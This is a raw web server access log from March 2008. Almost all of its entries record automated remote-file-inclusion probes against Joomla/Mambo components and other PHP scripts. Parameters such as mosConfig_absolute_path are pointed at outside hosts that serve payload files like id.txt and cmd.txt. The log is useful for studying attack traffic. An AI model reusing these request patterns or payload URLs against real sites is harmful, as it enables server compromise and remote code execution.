88.226.30.98 - - [25/Mar/2008:09:25:46 -0700] "GET /logs/access_080201.log HTTP/1.1" 200 524288 "http://search.yahoo.com/search?p=com_chronocontact%2Fexcelwriter%2FWriter%2FWorkbook.php%3FmosConfig_absolute_path&fr=yfp-t-355&toggle=1&cop=mss&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:09:25:49 -0700] "GET /logs/access_080215.log//login.php?dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.146.175.6 - - [25/Mar/2008:09:25:50 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.146.175.6 - - [25/Mar/2008:09:25:50 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.146.175.6 - - [25/Mar/2008:09:25:50 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:25:55 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:25:56 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:25:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.138.173 - - [25/Mar/2008:09:26:13 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.126.237.102 - - [25/Mar/2008:09:26:31 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:26:46 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:26:46 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:26:47 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:26:54 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:26:55 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:26:55 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:27:02 -0700] "GET /logs/access_080103.log/index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:27:08 -0700] "GET /logs/access_080103.log/index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.63.128.87 - - [25/Mar/2008:09:27:14 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.66" "www.dmulk.com"
209.12.244.192 - - [25/Mar/2008:09:27:16 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:09:27:25 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:09:27:28 -0700] "GET /index.php?redir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:09:27:30 -0700] "GET /logs/index.php?redir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:09:27:33 -0700] "GET /index1.php?site=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.97.198.42 - - [25/Mar/2008:09:27:43 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.61.101 - - [25/Mar/2008:09:27:44 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:27:50 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:09:28:00 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:09:28:01 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:09:28:01 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:09:28:02 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:09:28:02 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:09:28:03 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.254.30 - - [25/Mar/2008:09:28:34 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.96.199.124 - - [25/Mar/2008:09:28:36 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:28:39 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:28:39 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
189.26.87.181 - - [25/Mar/2008:09:29:00 -0700] "GET //tools/send_reminders.php?includedir=http://d34drbt.110mb.com/files/cmds/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.186.11.35 - - [25/Mar/2008:09:29:24 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:09:29:30 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:09:29:31 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:09:29:55 -0700] "GET /logs/access_080215.log/index1.php?site=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:09:29:55 -0700] "GET /logs/index1.php?site=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:09:30:17 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:09:30:18 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:09:30:20 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.74.30 - - [25/Mar/2008:09:30:23 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:09:30:29 -0700] "GET /logs/access_080127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:09:30:29 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.30.155 - - [25/Mar/2008:09:30:40 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
80.35.0.230 - - [25/Mar/2008:09:31:07 -0700] "GET /logs/access_080225.log/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:09:31:07 -0700] "GET /logs/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.3.15.73 - - [25/Mar/2008:09:31:11 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.3.15.73 - - [25/Mar/2008:09:31:11 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.3.15.73 - - [25/Mar/2008:09:31:11 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:09:31:36 -0700] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:09:31:45 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:09:31:45 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:09:31:46 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:09:31:47 -0700] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:09:32:05 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:09:32:39 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:09:33:06 -0700] "GET /logs/access_080225.log/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:09:33:06 -0700] "GET /logs/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.97.96 - - [25/Mar/2008:09:33:18 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.97.96 - - [25/Mar/2008:09:33:19 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.97.96 - - [25/Mar/2008:09:33:29 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:33:55 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:33:56 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:33:56 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:33:57 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:33:58 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:33:58 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.3.15.73 - - [25/Mar/2008:09:34:08 -0700] "GET /logs/access_080306.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.189.9.54 - - [25/Mar/2008:09:34:15 -0700] "GET /logs/access_080101.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.120 - - [25/Mar/2008:09:34:47 -0700] "GET /logs/access_080122.log HTTP/1.0" 200 590794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.146.175.6 - - [25/Mar/2008:09:34:51 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:09:35:06 -0700] "GET /logs/access_080103.log/index1.php?site=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.160.86 - - [25/Mar/2008:09:35:43 -0700] "GET /logs/access_080312.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.21.56 - - [25/Mar/2008:09:36:13 -0700] "GET /?S=A HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.75.103 - - [25/Mar/2008:09:36:39 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.75.103 - - [25/Mar/2008:09:36:41 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.75.103 - - [25/Mar/2008:09:36:43 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.75.103 - - [25/Mar/2008:09:36:44 -0700] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.75.103 - - [25/Mar/2008:09:37:44 -0700] "GET /logs/access_080215.log/akocomments.php?mosConfig_absolute_path=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.30.181.90 - - [25/Mar/2008:09:37:54 -0700] "GET /logs/access_071227.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.181.90 - - [25/Mar/2008:09:37:54 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.181.90 - - [25/Mar/2008:09:37:57 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:09:38:14 -0700] "GET /logs/access_080119.log/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:09:38:54 -0700] "GET //index.php?pagina=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.248.100.19 - - [25/Mar/2008:09:39:01 -0700] "GET /index.php?option=com_lmo&file=&action=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
89.248.100.19 - - [25/Mar/2008:09:39:01 -0700] "GET /logs/index.php?option=com_lmo&file=&action=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:09:39:25 -0700] "GET /index.php?redir=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:39:38 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.120 - - [25/Mar/2008:09:39:39 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 713220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.111 - - [25/Mar/2008:09:39:41 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:09:39:55 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.173.45 - - [25/Mar/2008:09:39:58 -0700] "GET /logs/access_080126.log/include/libchart-1.1/libchart.php?tm_includepath=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [25/Mar/2008:09:39:58 -0700] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:09:40:36 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:09:40:37 -0700] "GET /index.php?redir=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:09:40:37 -0700] "GET /logs/index.php?redir=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
189.26.87.181 - - [25/Mar/2008:09:40:55 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://d34drbt.110mb.com/files/cmds/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:09:40:55 -0700] "GET /logs/access_080124.log/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.73.90.73 - - [25/Mar/2008:09:42:08 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.73.90.73 - - [25/Mar/2008:09:42:08 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.73.90.73 - - [25/Mar/2008:09:42:09 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.105 - - [25/Mar/2008:09:42:18 -0700] "GET /?S=D HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:09:42:27 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:09:42:45 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:09:42:59 -0700] "GET /logs/access.log/index.php?redir=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:09:43:02 -0700] "GET /logs/access_080223.log//index2.php?p=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
